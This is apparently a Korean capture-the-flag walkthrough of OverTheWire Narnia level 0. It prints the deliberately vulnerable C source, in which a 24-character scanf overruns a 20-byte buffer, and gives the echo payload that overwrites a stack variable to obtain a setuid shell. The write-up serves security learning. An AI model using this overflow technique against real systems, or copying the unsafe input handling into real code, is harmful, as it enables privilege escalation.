접속
```
ssh narnia0@narnia.labs.overthewire.org -p 2226
narnia0
```

1. 소스코드 보기
```
narnia0@narnia:/narnia$ cat ./narnia0.c
/*
   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation; either version 2 of the License, or
   (at your option) any later version.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
   */
#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

```

![image](https://user-images.githubusercontent.com/61821641/155715301-b7d08cb1-e11c-46bc-ab65-1ad1001bdd1b.png)

![image](https://user-images.githubusercontent.com/61821641/155715414-1c76c10b-b146-427d-bec5-fc8abeb1aa58.png)

![image](https://user-images.githubusercontent.com/61821641/155715770-209a335e-46c4-4906-8326-77dea2b080f5.png)

- 20자가 넘어가면 val가 입력을 덮어쓰면서 0x41414141에서 0xdeadbeef로 바뀔 수 있음

```
echo -e "99999999999999999999\xef\xbe\xad\xde" | ./narnia0
```
- \x: hex
- -e: escape 문자 구분

![image](https://user-images.githubusercontent.com/61821641/155716130-5d202fa7-4fc4-4414-b83d-ff7bc0253d6f.png)

```
(echo -e "99999999999999999999\xef\xbe\xad\xde"; cat;) | ./narnia0
```
- cat 명령어로 i/o스트림을 열린 상태로 유지할 수 있다.

![image](https://user-images.githubusercontent.com/61821641/155716304-ada77c12-273a-44e7-a7f3-0dadd1cf0af0.png)



